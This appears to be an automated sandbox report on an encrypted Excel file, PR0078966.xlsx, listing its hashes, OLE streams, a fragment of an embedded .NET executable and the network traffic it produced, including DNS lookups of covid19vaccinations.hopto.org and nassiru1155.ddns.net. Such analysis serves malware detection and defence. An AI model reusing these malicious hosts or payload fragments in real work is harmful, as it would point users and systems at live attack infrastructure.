                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......l......j.... ........@.. ....................................@.....................................O.......4i...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...4i.......j..................@..@.reloc.......`......................@..B................L.......H.......................x................................................0............(#...($.........(.....o%....*.....................(&......('......((......()......(*....*N..(....o....(+....*&..(,....*.s-........s.........s/........s0........s1........*....0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0..<........~.....(7.....,!r...p.....(8...o9...s:............~.....+..*.0......

                                                          Static File Info

                                                          General

                                                          File type:CDFV2 Encrypted
                                                          Entropy (8bit):7.996815781154695
                                                          TrID:
                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                          File name:PR0078966.xlsx
                                                          File size:2592768
                                                          MD5:f5921b095b5db6eaa0cccb1cc9874a5b
                                                          SHA1:db7fec49af3b772abf7ffa409fa186860447f375
                                                          SHA256:5f5ec4a144dce14821a36549141718418145e253974eaae902c8acc73a514839
                                                          SHA512:559f7daa7399848f7e41462b62452698f652369b3ae48deae5ad102cce648f94bfd311427fb70609927004db1cab366d57f912a0fa834302b3399fcf7716bc68
                                                          SSDEEP:49152:ovj50M7X9ZNiPiuAxZwK7ddnMv8hLbtegBDhTa+qgsPsL6tDVPQ5:ovtJTiKuKdMv8tPvFqgs0u5pQ5
                                                          File Content Preview:........................>...................(....................................................................................................................................... ...!..."...#...$...%...&...........z.......|.......~......................

                                                          File Icon

                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                          Static OLE Info

                                                          General

                                                          Document Type:OLE
                                                          Number of OLE Files:1

                                                          OLE File "PR0078966.xlsx"

                                                          Indicators

                                                          Has Summary Info:False
                                                          Application Name:unknown
                                                          Encrypted Document:True
                                                          Contains Word Document Stream:False
                                                          Contains Workbook/Book Stream:False
                                                          Contains PowerPoint Document Stream:False
                                                          Contains Visio Document Stream:False
                                                          Contains ObjectPool Stream:
                                                          Flash Objects Count:
                                                          Contains VBA Macros:False

                                                          Streams

                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                          General
                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                          File Type:data
                                                          Stream Size:64
                                                          Entropy:2.73637206947
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                          General
                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                          File Type:data
                                                          Stream Size:112
                                                          Entropy:2.7597816111
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                          General
                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                          File Type:data
                                                          Stream Size:200
                                                          Entropy:3.13335930328
                                                          Base64 Encoded:False
                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                          General
                                                          Stream Path:\x6DataSpaces/Version
                                                          File Type:data
                                                          Stream Size:76
                                                          Entropy:2.79079600998
                                                          Base64 Encoded:False
                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 2568552
                                                          General
                                                          Stream Path:EncryptedPackage
                                                          File Type:data
                                                          Stream Size:2568552
                                                          Entropy:7.99986998424
                                                          Base64 Encoded:True
                                                          Data ASCII:V 1 ' . . . . . . T j . - w . M . P y ` . . . . | N O . 7 . . . . . . . y . , N W . . % . . . . . P . 2 b . . . . . . . n . . B . } . . . . B . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 . 4 - . . T s . . . . . . . 0 .
                                                          Data Raw:56 31 27 00 00 00 00 00 d1 54 6a b3 2d 77 aa 4d 06 50 79 60 fd e5 f1 07 7c 4e 4f 86 37 18 c8 ec 20 c0 af d6 f7 79 05 2c 4e 57 bb b1 25 82 7f e6 92 ac 50 fd 32 62 08 b9 1b 02 de cf 9a 6e cc ec 42 ad 7d b0 c5 eb 0a 42 d9 f8 ce e6 cd 1a 30 9c 34 2d a5 12 54 73 20 f2 d9 f8 ce e6 cd 1a 30 9c 34 2d a5 12 54 73 20 f2 d9 f8 ce e6 cd 1a 30 9c 34 2d a5 12 54 73 20 f2 d9 f8 ce e6 cd 1a 30 9c
                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                          General
                                                          Stream Path:EncryptionInfo
                                                          File Type:data
                                                          Stream Size:224
                                                          Entropy:4.51588229905
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . X > O . . 9 I 3 . c . g . 0 ! . . . S . . . d l t j . . $ . . . . . . . > . f ' # ? . . G 5 X . . . . . G . . . . . x . . . . E i . N .
                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 12, 2021 11:31:50.653959990 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:50.816370964 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:50.816478014 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:50.816945076 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:50.978774071 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:50.978810072 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:50.978823900 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:50.978840113 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:50.978921890 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:50.978955030 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.139926910 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140003920 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140041113 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140072107 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140125990 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140160084 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140170097 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.140194893 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140197039 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.140224934 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.140228033 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.140250921 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.140281916 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.302911043 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.302978992 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303020000 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303060055 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303097010 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303148031 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303195000 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303212881 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.303232908 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303273916 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303316116 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303354979 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303395033 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303433895 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303440094 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.303482056 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303498030 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.303525925 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303565025 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.303566933 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.303616047 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.307351112 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464677095 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464704037 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464723110 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464739084 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464745045 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464759111 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464767933 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464781046 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464790106 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464799881 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464807034 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464818954 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464819908 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464835882 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464837074 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464854956 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464854956 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464875937 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464875937 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464888096 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464896917 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464912891 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464915991 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464930058 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464935064 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464946985 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464951992 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464968920 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.464968920 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464983940 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.464986086 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465001106 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465003014 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465020895 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465020895 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465035915 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465037107 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465049028 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465056896 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465073109 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465076923 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465092897 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465094090 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465105057 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465112925 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465121031 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465130091 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465147018 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465147972 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465162992 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465163946 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465178967 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465181112 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 11:31:51.465197086 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 11:31:51.465200901 CEST804916713.235.115.155192.168.2.22

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 12, 2021 11:31:50.518306971 CEST5219753192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:31:50.577615976 CEST53521978.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:31:50.577949047 CEST5219753192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:31:50.636962891 CEST53521978.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:20.285085917 CEST5309953192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:20.342282057 CEST53530998.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:20.343131065 CEST5309953192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:20.401803017 CEST53530998.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:20.435535908 CEST5283853192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:32:20.494453907 CEST53528388.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:32:20.511164904 CEST6120053192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:20.571389914 CEST53612008.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:20.572062969 CEST6120053192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:20.633337975 CEST53612008.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:24.701483965 CEST4954853192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:24.761466980 CEST53495488.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:24.818521023 CEST5562753192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:32:24.880559921 CEST53556278.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:32:24.934355021 CEST5600953192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:24.995810986 CEST53560098.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:29.039258003 CEST6186553192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:29.097924948 CEST53618658.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:29.099054098 CEST6186553192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:29.159094095 CEST53618658.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:29.159571886 CEST6186553192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:29.218151093 CEST53618658.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:29.244254112 CEST5517153192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:32:29.303083897 CEST53551718.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:32:29.303605080 CEST5517153192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:32:29.363369942 CEST53551718.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:32:29.464906931 CEST5249653192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:29.514780045 CEST53524968.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:49.325118065 CEST5756453192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:49.376719952 CEST53575648.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:49.428504944 CEST6300953192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:32:49.480118036 CEST53630098.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:32:49.513602972 CEST5931953192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:49.576049089 CEST53593198.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:53.615348101 CEST5307053192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:53.672323942 CEST53530708.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:53.672796011 CEST5307053192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:53.721529961 CEST53530708.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:53.763920069 CEST5977053192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:32:53.822905064 CEST53597708.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:32:53.839982986 CEST6152353192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:53.888621092 CEST53615238.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:53.889116049 CEST6152353192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:53.945800066 CEST53615238.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:57.983613014 CEST6279153192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:58.032391071 CEST53627918.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:58.033023119 CEST6279153192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:58.090007067 CEST53627918.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:58.158997059 CEST5066753192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:32:58.217211962 CEST53506678.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:32:58.234457970 CEST5412953192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:58.284317970 CEST53541298.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:32:58.285072088 CEST5412953192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:32:58.333916903 CEST53541298.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:18.176796913 CEST6532953192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:18.241116047 CEST53653298.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:18.312613010 CEST6071853192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:33:18.370712042 CEST53607188.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:33:18.417473078 CEST4915753192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:18.474462032 CEST53491578.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:22.508759022 CEST5739153192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:22.566188097 CEST53573918.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:22.566920996 CEST5739153192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:22.615648031 CEST53573918.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:22.653704882 CEST6185853192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:33:22.704150915 CEST53618588.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:33:22.733686924 CEST6250053192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:22.782644987 CEST53625008.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:22.783457994 CEST6250053192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:22.841954947 CEST53625008.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:26.876676083 CEST5165253192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:26.925582886 CEST53516528.8.8.8192.168.2.22
                                                          Apr 12, 2021 11:33:26.971744061 CEST6276253192.168.2.228.8.4.4
                                                          Apr 12, 2021 11:33:27.033773899 CEST53627628.8.4.4192.168.2.22
                                                          Apr 12, 2021 11:33:27.116089106 CEST5690553192.168.2.228.8.8.8
                                                          Apr 12, 2021 11:33:27.165102959 CEST53569058.8.8.8192.168.2.22

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Apr 12, 2021 11:31:50.518306971 CEST192.168.2.228.8.8.80x1dffStandard query (0)covid19vaccinations.hopto.orgA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:31:50.577949047 CEST192.168.2.228.8.8.80x1dffStandard query (0)covid19vaccinations.hopto.orgA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.285085917 CEST192.168.2.228.8.8.80xc76fStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.343131065 CEST192.168.2.228.8.8.80xc76fStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.435535908 CEST192.168.2.228.8.4.40xf04eStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.511164904 CEST192.168.2.228.8.8.80xa4faStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.572062969 CEST192.168.2.228.8.8.80xa4faStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:24.701483965 CEST192.168.2.228.8.8.80x28e8Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:24.818521023 CEST192.168.2.228.8.4.40xe8b4Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:24.934355021 CEST192.168.2.228.8.8.80x1011Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.039258003 CEST192.168.2.228.8.8.80xfa7dStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.099054098 CEST192.168.2.228.8.8.80xfa7dStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.159571886 CEST192.168.2.228.8.8.80xfa7dStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.244254112 CEST192.168.2.228.8.4.40x2834Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.303605080 CEST192.168.2.228.8.4.40x2834Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.464906931 CEST192.168.2.228.8.8.80xb7a4Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:49.325118065 CEST192.168.2.228.8.8.80xe026Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:49.428504944 CEST192.168.2.228.8.4.40x45b8Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:49.513602972 CEST192.168.2.228.8.8.80x9831Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.615348101 CEST192.168.2.228.8.8.80xae36Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.672796011 CEST192.168.2.228.8.8.80xae36Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.763920069 CEST192.168.2.228.8.4.40xb0bcStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.839982986 CEST192.168.2.228.8.8.80xaddbStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.889116049 CEST192.168.2.228.8.8.80xaddbStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:57.983613014 CEST192.168.2.228.8.8.80x167aStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.033023119 CEST192.168.2.228.8.8.80x167aStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.158997059 CEST192.168.2.228.8.4.40x2987Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.234457970 CEST192.168.2.228.8.8.80x248dStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.285072088 CEST192.168.2.228.8.8.80x248dStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:18.176796913 CEST192.168.2.228.8.8.80xba10Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:18.312613010 CEST192.168.2.228.8.4.40x4072Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:18.417473078 CEST192.168.2.228.8.8.80xf297Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
